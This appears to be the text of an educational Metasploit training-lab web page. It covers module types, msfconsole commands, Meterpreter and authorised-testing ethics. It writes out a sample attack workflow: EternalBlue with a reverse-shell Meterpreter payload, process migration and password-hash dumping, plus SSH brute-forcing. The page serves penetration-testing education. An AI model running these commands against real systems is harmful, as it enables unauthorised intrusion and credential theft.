Metasploit Training Lab - Dark Arts Vault

What is Metasploit Framework?

Metasploit Framework is the world's most popular penetration testing platform. It provides a standardized workflow for discovering, exploiting, and validating vulnerabilities in systems, applications, and networks. Think of it as a "Swiss Army knife for ethical hackers" - a comprehensive toolkit that automates much of the manual work involved in penetration testing.

CRITICAL: Legal and Ethical Use Only

Metasploit is a powerful tool that MUST ONLY be used on systems you own or have explicit written authorization to test. Unauthorized access to computer systems is a serious crime punishable by law. This lab teaches concepts and methodology - NOT how to attack real systems.

Why Do We Need Metasploit?

Vulnerability Validation: Prove that a discovered vulnerability is actually exploitable
Penetration Testing: Simulate real-world attacks to assess security posture
Security Research: Develop and test new exploit techniques safely
Red Team Operations: Test organizational defenses with realistic adversarial scenarios
Post-Exploitation: Assess damage potential once a system is compromised

The Penetration Testing Lifecycle

Reconnaissance: Gather information about the target (passive and active)
Scanning & Enumeration: Identify live hosts, open ports, and running services
Vulnerability Analysis: Detect potential security weaknesses
Exploitation: Attempt to gain access using discovered vulnerabilities
Post-Exploitation: Maintain access, escalate privileges, pivot to other systems
Reporting: Document findings and recommend remediation

Key Concept

Metasploit primarily assists with phases 4 (Exploitation) and 5 (Post-Exploitation). It's not a complete solution - you still need reconnaissance, scanning, and vulnerability assessment tools like Nmap, Nessus, or OpenVAS.

Metasploit Architecture

Understanding Metasploit's modular architecture is essential. Each module type serves a specific purpose in the testing workflow.

1. Exploits

Exploits are pieces of code that take advantage of a vulnerability to compromise a target system. They leverage flaws in software, configurations, or protocols to gain unauthorized access.

                                exploit/windows/smb/ms17_010_eternalblue   # Exploits SMB vulnerability

                                exploit/multi/handler                      # Generic payload handler

                                exploit/linux/http/apache_mod_cgi_bash_env_exec  # Shellshock

2. Payloads

Payloads are the code that runs on the target system AFTER exploitation succeeds. They define what you want to do once you have access.

                                windows/meterpreter/reverse_tcp    # Meterpreter shell (Windows)

                                linux/x64/shell/reverse_tcp        # Command shell (Linux)

                                cmd/unix/reverse_python            # Python-based reverse shell

Common Confusion: Exploit vs Payload

Exploit: The delivery mechanism - HOW you get in (exploits a vulnerability)
Payload: What you do once inside - WHAT you want to run on the target

Analogy: The exploit is the key that unlocks the door. The payload is what you do once you're inside the house.

3. Auxiliary Modules

Auxiliary modules perform supporting tasks that don't directly exploit vulnerabilities but assist in reconnaissance, scanning, and information gathering.

                                auxiliary/scanner/portscan/tcp       # TCP port scanner

                                auxiliary/scanner/smb/smb_version    # SMB version detection

                                auxiliary/scanner/http/http_version  # Web server fingerprinting

4. Post-Exploitation Modules

These modules run AFTER you've already compromised a system. They help with privilege escalation, lateral movement, data collection, and maintaining persistence.

                                post/windows/gather/hashdump         # Extract password hashes

                                post/multi/recon/local_exploit_suggester  # Find privilege escalation paths

                                post/windows/manage/migrate          # Move to different process

Understanding msfconsole

The msfconsole is Metasploit's primary command-line interface. It provides an interactive environment for selecting modules, configuring options, and launching attacks.

Basic Navigation Commands

                                help                    # Show all available commands

                                search [keyword]        # Search for modules

                                use [module_path]       # Select a module to use

                                info                    # Show detailed information about current module

                                show options            # Display configurable options

                                show payloads           # List compatible payloads

                                set [option] [value]    # Configure an option

                                exploit or run       # Execute the module

                                back                    # Return to main console

                                exit                    # Quit msfconsole

Searching for Modules

                                search smb               # Search for SMB-related modules

                                search type:exploit platform:windows  # Filter by type and platform

                                search cve:2017 rank:excellent        # Search by CVE and reliability rank

Pro Tip: Module Ranks

Modules are ranked by reliability: Excellent > Great > Good > Normal > Average > Low > Manual. Always prefer "Excellent" or "Great" ranked modules for real engagements.

Stages vs Stagers (Advanced Concept)

Payload names like windows/meterpreter/reverse_tcp contain important information about how the payload is delivered.

Staged Payloads (has a slash /)

Example: windows/meterpreter/reverse_tcp

Two-stage delivery: First, a small "stager" is sent (stage 0)
The stager then downloads the full payload (stage 1) from the attacker
Advantage: Smaller initial payload, better for tight size restrictions
Disadvantage: Requires stable connection for second stage download

Stageless Payloads (has an underscore _)

Example: windows/meterpreter_reverse_tcp

Single-stage delivery: Entire payload sent at once
Advantage: More stable, no second connection needed, works with IDS/firewall evasion
Disadvantage: Larger size, may not fit in exploits with size constraints

When to Use Each

Staged: Tight space constraints, reliable network
Stageless: Unstable networks, restrictive firewalls, need reliability

Meterpreter: The Power Tool

Meterpreter is Metasploit's advanced payload that provides a powerful post-exploitation platform. Unlike a simple shell, Meterpreter runs entirely in memory and offers sophisticated capabilities.

Why Meterpreter is Special

Memory Resident: Runs in RAM, doesn't write to disk (harder to detect)
Encrypted Communication: All traffic is encrypted by default
Extensible: Load additional modules on-the-fly
Cross-Platform: Works on Windows, Linux, macOS, Android

Essential Meterpreter Commands

                                sysinfo                # Display system information

                                getuid                 # Show current user

                                ps                     # List running processes

                                migrate [PID]          # Move to another process (for persistence)

                                hashdump               # Dump password hashes

                                screenshot             # Capture screen

                                download [remote] [local]  # Download files

                                upload [local] [remote]    # Upload files

                                shell                  # Drop into system shell

                                background             # Background current session

Rules of Engagement and Ethics

MANDATORY REQUIREMENTS

Before conducting ANY penetration testing with Metasploit:

Written Authorization: Obtain explicit, signed permission from the system owner
Scope Definition: Clearly define which systems, networks, and timeframes are in-scope
Rules of Engagement (ROE): Document what actions are permitted and prohibited
Emergency Contacts: Have escalation procedures if something goes wrong
Legal Review: Ensure compliance with applicable laws and regulations

What Can Go Wrong

Exploits can crash systems and cause downtime
Production data could be corrupted or lost
Network performance may be impacted
Security tools may trigger, alerting defenders
Legal liability if authorization is unclear

Legal Consequences

In the United States, unauthorized access to computer systems violates the Computer Fraud and Abuse Act (CFAA) and can result in criminal charges, fines up to $250,000, and imprisonment up to 20 years for repeat offenses. Other countries have similar laws.

Ethical Testing Principles

Confidentiality: Protect client data and findings
Integrity: Report all findings accurately, including those that don't favor your conclusions
Professionalism: Conduct tests during agreed timeframes with minimal disruption
Due Care: Take precautions to avoid causing damage
Disclosure: Provide clients with actionable remediation guidance

Ready to Practice?

Head to the Console Lab tab to practice Metasploit commands in a safe, simulated environment. Then test your skills in the Challenges section!

Safe Learning Environment

The Console Lab provides a simulated msfconsole with educational responses. No actual exploitation occurs - you're learning the workflow and command structure safely.

       =[ metasploit v6.3.45-dev                          ]
+ -- --=[ 2376 exploits - 1234 auxiliary - 413 post       ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops          ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the 'search' command to find modules by keyword, CVE, or platform.

EDUCATIONAL SIMULATOR - No actual exploitation occurs in this lab

Type 'help' for available commands or try: search smb

msf6 >

Your Progress

0 of 10 challenges completed 0 points

Search Commands

search [keyword]

Search for modules by keyword

search type:exploit [keyword]

Search only exploit modules

search platform:windows

Search by target platform

search cve:YYYY

Search by CVE year

Module Selection

use [module_path]

Select a module to configure

info

Show detailed module information

show options

Display configurable options

show payloads

List compatible payloads

show targets

Display available target versions

back

Return to main msfconsole prompt

Configuration

set RHOSTS [target]

Set remote target host(s)

set LHOST [attacker_ip]

Set local (attacker) IP address

set LPORT [port]

Set local listening port

set PAYLOAD [payload_path]

Choose what runs on target after exploit

setg [option] [value]

Set global option (persists across modules)

unset [option]

Clear an option value

Execution

exploit

Run the configured exploit

run

Alternative to 'exploit' (same function)

exploit -j

Run as background job

check

Check if target is vulnerable (no exploit)

Session Management

sessions

List all active sessions

sessions -i [id]

Interact with specific session

sessions -k [id]

Kill a session

background

Background current session (Ctrl+Z)

Meterpreter Commands

sysinfo

Display target system information

getuid

Show current user privileges

List running processes

migrate [PID]

Move to different process for stability

hashdump

Dump password hashes (requires privileges)

screenshot

Capture target screen

shell

Drop into system command shell

download [remote] [local]

Download file from target

Auxiliary Modules

auxiliary/scanner/portscan/tcp

TCP port scanning

auxiliary/scanner/smb/smb_version

Detect SMB version

auxiliary/scanner/http/http_version

Fingerprint web servers

auxiliary/scanner/ssh/ssh_login

SSH brute force / credential testing

Common Workflows

                                # Basic exploitation workflow

                                search ms17_010

                                use exploit/windows/smb/ms17_010_eternalblue

                                show options

                                set RHOSTS 192.168.1.100

                                set PAYLOAD windows/x64/meterpreter/reverse_tcp

                                set LHOST 192.168.1.50

                                exploit

                                # Once you have a Meterpreter session

                                sysinfo

                                getuid

                                ps

                                migrate 1234

                                hashdump

Progress Management

Export your progress to save your challenge completions, or import previously saved progress.

Statistics

Challenges Completed 0

Total Points Earned 0

Commands Executed 0

Modules Explored 0

Reset Progress

Warning: This will clear all challenge completions and reset your statistics. This action cannot be undone unless you've exported your progress.

About This Lab

This Metasploit Training Lab is an educational simulator designed to teach penetration testing concepts, Metasploit Framework architecture, and ethical hacking methodology in a safe, controlled environment. No actual exploitation occurs in this lab.

REMINDER: Real penetration testing requires written authorization, clearly defined rules of engagement, and strict adherence to legal and ethical guidelines. Unauthorized access to computer systems is illegal.

Version: 1.0.0
Part of: Hexworth Prime - Dark Arts Vault

Contextual Help

As you work through challenges and execute commands, helpful context and tips will appear here.

Metasploit Framework Training Lab